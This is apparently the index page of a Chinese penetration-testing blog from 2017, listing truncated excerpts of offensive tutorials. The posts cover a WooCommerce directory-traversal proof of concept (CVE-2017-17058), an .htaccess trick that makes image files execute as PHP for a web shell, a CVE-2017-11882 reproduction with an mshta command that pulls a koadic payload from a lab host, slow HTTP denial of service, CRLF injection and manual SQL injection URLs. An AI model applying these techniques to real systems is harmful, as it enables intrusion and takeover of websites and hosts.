01 CVE-2017-17058:WordPress插件WooCommerce 2.0/3.0 – 目录遍历

heiye     2017.12.01     渗透测试     抢沙发     152人打酱油
漏洞验证代码 $woo="www/wp-content/plugins/woocommerce/templates/emails/plain/";` functionfile_get_contents_utf8($fn){ $opts=array( 'http'=&...

29 .htaccess拿shell

admin     2017.11.29     渗透测试     抢沙发     78人打酱油
新建个.htaccess文件内容: ForceTypeapplication/x-httpd-php SetHandlerapplication/x-httpd-php 在他当前目录下只要是以jpg结尾的都会以PHP程序去解析 ...

22 CVE-2017-11882复现配合koadic

admin     2017.11.22     渗透测试     抢沙发     260人打酱油
项目地址:https://github.com/iBearcat/CVE-2017-11882 首先开启koadic,然后配置一下 复制这句代码 mshtahttp://192.168.220.132:9999/dHem0 然后生成doc文件 ┌─[[email protected]]...
0x01前言 主要记录缓慢的Http拒绝服务攻击漏洞的验证过程。 0x02什么是Http拒绝服务攻击? 缓慢的http拒绝服务攻击是一种专门针对于Web的应用层拒绝服务攻击,攻击者操纵网络上的肉鸡,对目标Web服务器进行海量httprequest攻击,直到服务器带宽被打...

20 CRLF注射教程

admin     2017.11.20     渗透测试     抢沙发     77人打酱油
CRLF注射剂定义 CRLF指特殊字符元素“回车”和“换行”。这些元素嵌入在HTTP头文件和其他软件代码中,以表示行尾(EOL)标记。许多互联网协议,包括MIME(电子邮件),NNTP(新闻组),更重要的是HTTP,使用CRLF序列将文本流分离成离散的元素。Web应用程序开发人员根...

20 access手工sql注入基础

admin     2017.11.20     渗透测试     抢沙发     57人打酱油
判断注入 Orderby2222代表查询的列名的数目有22个 http://127.0.0.1/test.asp?id=xxorderby22正常(小于等于22均正常) http://127.0.0.1/test.asp?id=xxorderby23错误 猜解表名确定存在admin表名 ht...

关闭